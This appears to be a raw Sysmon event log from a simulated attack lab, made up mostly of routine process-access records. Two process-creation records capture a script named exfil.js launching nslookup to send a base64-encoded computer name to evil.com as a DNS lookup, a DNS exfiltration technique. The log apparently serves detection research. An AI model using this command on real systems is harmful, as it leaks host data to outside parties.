14:16:03.793{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.793{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.793{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.793{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.793{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-813D-000000005F02}4832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.793{2E1864BB-17A3-629A-7F3D-000000005F02}29444128C:\Windows\system32\cmd.exe{2E1864BB-17A3-629A-813D-000000005F02}4832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.797{2E1864BB-17A3-629A-813D-000000005F02}4832C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A3-629A-7F3D-000000005F02}2944C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllhwg.tmp 2>&1 23542300x8000000000000000193841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.792{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=518E8657462BD52EE77F4AD81BEBDEC5,SHA256=61D2FF1C65827D56D6FBCDA19802046613E17EF2567D1EA9AFFD6A1F4777690C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.753{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A3-629A-803D-000000005F02}1700C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.753{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A3-629A-803D-000000005F02}1700C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.737{2E1864BB-17A3-629A-803D-000000005F02}17006424C:\Windows\system32\conhost.exe{2E1864BB-17A3-629A-7F3D-000000005F02}2944C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.721{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-803D-000000005F02}1700C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.721{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.721{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.721{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.721{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.721{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-7F3D-000000005F02}2944C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.721{2E1864BB-17A1-629A-783D-000000005F02}55524012C:\Windows\System32\WScript.exe{2E1864BB-17A3-629A-7F3D-000000005F02}2944C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.727{2E1864BB-17A3-629A-7F3D-000000005F02}2944C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllhwg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000193829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.706{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.706{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.690{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.690{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.690{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.690{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.690{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.690{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.690{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 